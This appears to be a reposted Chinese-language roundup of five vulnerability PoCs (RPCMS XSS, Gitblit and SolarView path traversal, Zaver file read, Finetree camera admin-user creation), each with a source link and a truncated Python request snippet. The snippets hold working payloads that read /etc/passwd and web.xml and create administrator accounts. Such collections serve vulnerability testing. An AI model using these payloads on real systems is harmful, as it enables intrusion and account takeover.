Vulnerabilities
RPCMS 跨站脚本攻击 | CVE-2022-41473
文 章: https://henry4e36.top/index.php/archives/110.html
POC:
......payload = {baseurl} + "/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",}try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
Gitblit 路径遍历漏洞 | CVE-2022-31268
文 章: https://henry4e36.top/index.php/archives/88.html
POC:
......payload = self.url + "/resources//../WEB-INF/web.xml"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
Finetree 5MP 摄像机任意用户添加 | CNVD-2021-42372
文 章: https://cn-sec.com/archives/404349.html
POC:
......payload = self.url + "/quicksetup/user_update.php"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0","Content-Type": "application/x-www-form-urlencoded"}username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))passwd = ''.join(random.sample("ab[email protected]#",8))data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0" # 1.访客 2.操作者 3.管理员try:res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)......
Zaver 任意文件读取 | CVE-2022-38794
文 章: https://github.com/zyearn/zaver/issues/22
POC:
......payload = self.url + "/../../../../../../../../etc/passwd"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
SolarView Compact 路径遍历漏洞 | CVE-2022-29298
文 章: https://henry4e36.top/index.php/archives/121.html
POC:
......payload = self.url + "/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
文章来源: http://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247485924&idx=1&sn=2d5315b0d973e125a61315425e348147&chksm=c1f92656f68eaf4030b79975e05399d0353cdea3fd0aa592d2ca7dbe4971eb14fd3172dfd192#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh